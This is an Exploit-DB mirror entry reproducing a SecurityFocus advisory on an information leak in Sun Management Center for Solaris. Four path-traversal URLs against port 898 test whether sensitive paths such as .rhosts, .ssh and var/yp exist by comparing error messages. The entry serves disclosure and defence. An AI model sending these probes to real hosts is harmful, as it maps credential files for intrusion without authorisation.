exploit-db-mirror/platforms/solaris/remote/23272.txt
Offensive Security fffbf04102 Updated
2013-12-03 19:44:07 +00:00

10 lines
No EOL
558 B
Text
Executable file

source: http://www.securityfocus.com/bid/8873/info
A problem in the handling of error messages has been identified in Sun Management Center. Because of this, an attacker may be able to gain sensitive information about vulnerable hosts.
http://www.example.com:898/../../../../../tmp/.X11-unix
http://www.example.com:898/../../../../../.rhosts
http://www.example.com:898/../../../../../.ssh
http://www.example.com:898/../../../../../var/yp
These examples were return different error messages based on whether the requested resource exists or not.